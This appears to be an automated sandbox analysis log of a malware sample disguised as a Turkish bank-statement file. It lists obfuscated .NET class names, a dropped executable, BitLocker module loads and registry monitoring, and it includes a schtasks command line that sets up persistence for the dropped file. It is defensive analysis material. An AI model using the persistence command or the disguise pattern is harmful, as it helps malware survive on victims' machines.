Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, Ko7IMtf4CrY0h1WQOu.cs	High entropy of concatenated method names: 'Dispose', 'oeervpgH9B', 'mlG6Wdh2pP', 'PGeSiJCcmn', 'bILrNqnZYd', 'rAJrz8KRDP', 'ProcessDialogKey', 'dDs6k4XmoY', 'eDU6rSE1We', 'LDv66VLNBR'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, CW80Qut4BpiAjVjpYc.cs	High entropy of concatenated method names: 'ToString', 'GOLQhjERu0', 'ygaQWMuLoe', 'ly4QoeMMpB', 'CWoQLevM9X', 'qGMQEdo0nX', 'AmXQD7ooUG', 'JUcQCn1Xp4', 'Aa7Qs9Hb6q', 'bgfQdAnSva'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, dY1Tqkdy6ok8obEuYlU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C91SuVtQwV', 'H2SSPRTiL8', 'FQNSyJVsTW', 'q3YSSUg3DH', 'O1JSUKYwjg', 'NVPSIXCs0B', 'r9DSqPpJX1'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, r0d7cDQUweiaQEsmgN.cs	High entropy of concatenated method names: 'sRZu5wmGkG', 'Y8auWRnorv', 'yx2uo9Ky5B', 'XThuL6G1T3', 'C9CuEKdIij', 't24uDKiMY5', 'q8LuC8WqMp', 'WLuusvHwG0', 'pa5udu3xZA', 'afyu30AQGC'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, u5ODOojcVMB5v7DYoZ.cs	High entropy of concatenated method names: 'gv3l2XxjpQ', 'jKBlaLFBiw', 'giol0ST8Wa', 'N0TlTTlWZv', 'J7YliWgbLy', 'fqMlVb06Oe', 'XUIl9Davi7', 'cHXljw2Dje', 'YnMlv8sYJ9', 'Hx4lNuEbDq'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, c6qRU92LmfTIB8Prt7.cs	High entropy of concatenated method names: 'lMYBYAv8lt', 'y97BfCPdt7', 'ttoBl28Zby', 'gCEBc2iAAN', 'xfwBxbIUNL', 'iVsBbNmheZ', 'VjSBMTQ61m', 'T5iBnmQk7V', 'cXtBmatoyM', 'zRUBH4hDmJ'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, fxEgcJ5NyhtOep4Fb0.cs	High entropy of concatenated method names: 'hE2uGQ16vP', 'xKBup4oxNJ', 'FSRuuaKjrb', 'aRpuylDgII', 'avuuUtXttB', 'Fq7uqMsrjU', 'Dispose', 'DWTXfTr4Wm', 'x0uXlToF59', 'wXwXcbjtNy'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, VMWaIyAQKMIEV0FD9T.cs	High entropy of concatenated method names: 'SqLMfm85EL', 'J8MMcYmEFt', 'vf6MbVvMCN', 'xnhbNa4ZJp', 'SsDbz0qO0R', 'PpQMkNBTu2', 'gX0MrDsKuE', 'FsIM6L3Uou', 'wSEMBP3Uxd', 'YdmMOOXo42'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, UDiiJnw1Hp79Jj03lb.cs	High entropy of concatenated method names: 'zOYM166WfT', 'lD6MeqYvOM', 'p2EMJroavD', 'pauMA9QrR6', 'fH9M4b8joq', 'T2FMRBZXNW', 'kMVMFFhMeF', 'eEnM7Gb8y8', 'HbIMgcKbK5', 'o9DMwcXVZK'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, BTgJ7sq3hJJtKiNPqn.cs	High entropy of concatenated method names: 'kRnpjfdJQg', 'ynopNDM0Pg', 'M3PXkUFZb5', 'uQ2Xr4bCF0', 'KU5phAHalq', 'qtKpZru6Ds', 'qAhpKJ3E5h', 'X15p25Q4Zi', 'YrVpathfIp', 'jSvp0kLDsn'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, VdQyoHdgnWIkCKlIlRI.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fWuPhEcd4t', 'hFZPZDma1u', 'ewEPKg6lq5', 'fEiP2EndCB', 'WF5Pa5TLB6', 'ssQP0w1ed1', 'DyxPTtTM7S'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, To30UNLtC0nEtywNYt.cs	High entropy of concatenated method names: 'iF4bqtsL0I', 'jOnb1MsQkA', 'MfqbJbTHvE', 'J3ubALN5Sq', 'lMdbRd7gZD', 'QA6bFivqKW', 'iWobgItSZC', 'Ceqbw54Fn8', 'wvduQsI7cak5Cmx736E', 'cn9BtMIkGaGGdsyUoVZ'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, K5lqmHyu7ODhNUu77O.cs	High entropy of concatenated method names: 'yIkrMTMyGC', 'BdTrnJ9qRr', 'pW6rHEaV6K', 'Kiwr82ja03', 'qf2rGBXnuo', 'hvorQZrwr4', 'pZr9lKey8bLdeKQ6kd', 'Wbd3jV4ISBrxjN4WXb', 'I2prr3JEWo', 'HnJrBespKJ'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, YMBYk76LDorWkf26Xh.cs	High entropy of concatenated method names: 'HKncAHVNR8', 'Nx2cRRTxGv', 'xQ7c7nCDic', 'QBNcgc4xGU', 'rF7cG0HXUG', 'eircQPpHet', 'Aujcpq4mZy', 'CL4cXhQaXj', 'MPqcuLVYj2', 'j8UcPqh2Kj'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, EvlavFUWmZ7gF0BROA.cs	High entropy of concatenated method names: 'A7mx452YyY', 'XiAxFWxZeI', 'lKucoFujrn', 'D0kcLEBcYp', 'kBgcESkses', 'UhIcDhVvDB', 'mSfcCUlfhZ', 'kTtcsawrRS', 'JMscdx6ZwH', 'c22c3Q8JCk'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, KwHsDJzCn6bn4ZafAu.cs	High entropy of concatenated method names: 'KWCPRTyY47', 'eI2P7A0bhf', 'OUxPgHp76n', 'q5pP5HIuHo', 'jDdPWH02J8', 'iG2PLgUUCq', 'lQ0PEA5GdB', 'DjqPqXnNed', 'VMvP1NoWiy', 'FF2PeEgeWe'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, K5Kam2hHP1AJp983HT.cs	High entropy of concatenated method names: 'RhQt7nrNVb', 'L6AtgmUwc2', 'HFVt5X0wNE', 'nCQtWaVhxX', 'bGQtLsaD71', 'GqOtEv9mOw', 'ehStC6oEHx', 'lP2tsPqomY', 'rAbt3A2GLH', 'oauthcKk2q'

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

File created: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EfgRyiVrT" /XML "C:\Users\user\AppData\Local\Temp\tmp211D.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
